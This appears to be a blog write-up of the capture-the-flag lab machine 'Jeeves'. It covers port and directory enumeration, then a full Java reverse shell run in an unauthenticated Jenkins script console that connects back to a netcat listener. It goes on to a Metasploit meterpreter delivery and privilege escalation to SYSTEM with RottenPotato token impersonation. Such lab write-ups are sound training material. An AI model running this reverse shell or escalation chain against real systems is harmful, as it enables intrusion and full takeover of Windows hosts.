Jeeves is a machine that is rated easy, this machine is hacked through exploiting unauthenticated jeeves dashboard usage. A java reverse shell is executed in Jeeves’ console script (where groovy script can be run for troubleshooting) is run and a reverse connection is connected back to my netcat server.

Once the reverse connection is established, I moved to the user’s desktop to get my user flag.

Checking on the user’s privilege there is a SeImpersonatePrivilege which is a condition to run rottenpotato to elevate to “NT Authority\System”

The next is privilege escalation with rottenpotato, rottenpotato works with incognito which is easily loaded if the shell is a meterpreter, the video on how to do the rottenpotato attack can be found here.

After the root flag is obtained, the last thing is to exit meterpreter and do a clean up with another connection by deleting the uploaded rottenpotato, to delete it has to be kill forcefull with taskkill /PID <pid of rottenpotato.


nmap -A -p- -oN jeeves -vvv

Increasing send delay for from 0 to 5 due to 61 out of 202 dropped probes since last increase.
Nmap scan report for
Host is up, received syn-ack (0.17s latency).
Scanned at 2020-05-02 21:58:07 +08 for 595s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55172/tcp): CLEAN (Timeout)
|   Check 2 (port 48223/tcp): CLEAN (Timeout)
|   Check 3 (port 55682/udp): CLEAN (Timeout)
|   Check 4 (port 48293/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-02T19:10:36
|_  start_date: 2020-05-02T18:53:29

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds

Directory enumeration with gobuster on port 50000

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum

The result is /askjeeves (Status: 302)

Check the


Clicking on “Manage Jenkins” I found “Script Console”.

Reverse shell connection

I borrowed the java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and did changes on port and ip address.

String host="";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();


Then before I run the script on Jeeves script console I set up a nc service nc -lvnp 1337


Get the user flag


User’s privilege

the user has a SeImpersonatePrivilege which can be exploited by rottenpotato.exe.

Get meterpreter connection

I would need incognito to execute the rottenpotato in the background, the easiest around would be to load incognito from meterpreter.

To get a meterpreter I would be using exploit/multi/script/web_delivery to deliver the stagers over to Jeeves.


I used these settings for my exploit, target 2 is to specify that it is powershell, the default payload is a python script, hence after setting to target 2 I will have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with powershell.

The Jeeves machine runs a Windows 10 Pro, 64-bit, but I could not get the x64 reverse tcp delivered, the good old payload/windows/meterpreter/reverse_tcp was delivered.


I will copy and paste the powershell payload over to the nc session.


Privilege escalation

I have already downloaded the rottenpotato, I will upload the rottenpotato over to Jeeves, I have also loaded incognito, both load incognito and use incognito works.

By calling help, these are the incognito commands:

the current user has no tokens to impersonate, but after rottenpotato is executed the “NT Authority\System” will be available for impersonation.

The available options for execute are as follows:

execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe, this will execute the rottenpotato in the background and create a channel for interacting with incognito.

Run list_tokens -u I will have available token to impersonate.

Run the incognito command: impersonate_token "NT AUTHORITY\SYSTEM".

There is a small twist, the hm.txt does not directly reveal the root flag.

I create a shell from meterpreter to execute dir /R this will reveal if any files have alternate stream.

read the alternate stream content: more < hm.txt:root.txt

Clean up

When I used tasklist /svc the rottenpotato was not displayed which is intended due to the execute -H option.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s